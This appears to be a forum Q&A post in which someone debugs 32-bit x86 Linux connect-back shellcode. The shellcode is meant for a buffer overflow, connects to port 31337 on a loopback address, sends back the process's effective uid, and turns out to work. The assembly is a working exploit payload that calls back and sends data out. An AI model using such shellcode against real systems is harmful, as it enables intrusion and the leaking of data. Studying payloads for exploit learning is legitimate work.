# Connect-back shellcode return uid

Tags: c, sockets, assembly, shellcode

Im writing a connect-back shellcode that could connect back to my machine(in my case, use loop address), and send the current user id of the program where buffer overflow occurs. But my shellcode just sends back four bytes of zeros, can any one point out where i am go wrong in the send system call?

```
BITS 32

; s = socket(2, 1, 0)
  push BYTE 0x66    
  pop eax
  cdq               
  xor ebx, ebx      
  inc ebx          
  push edx          
  push BYTE 0x1     
  push BYTE 0x2     
  mov ecx, esp      
  int 0x80          

  xchg esi, eax     

; connect(s, [2, 31337, <IP address>], 16)
  push BYTE 0x66   
  pop eax
  inc ebx           
  push DWORD 0x01BBBB7f 
  mov WORD [esp+1], dx  
  push WORD 0x697a  
  push WORD bx      
  mov ecx, esp      
  push BYTE 16     
  push ecx          
  push esi          
  mov ecx, esp      
  inc ebx           
  int 0x80         

;geteuid
  push BYTE 0x31
  pop eax
  int 0x80

;send(sockfd,buffer,strlen(buffer),0)
  push eax
  mov ecx, esp
  push edx
  push BYTE 0x4
  push ecx
  push esi
  mov ecx, esp
  push BYTE 0x66
  pop eax
  push BYTE 0x9
  pop ebx
  int 0x80
```

Comment: Are you running it as root, by any chance? 0 would be correct then. It works for me with non-root user too. Also, run it through `strace` so you can see what `geteuid()` returns.

Comment: Thx for your help. Actually I straced this and found out the code has nothing wrong. Im such a noob.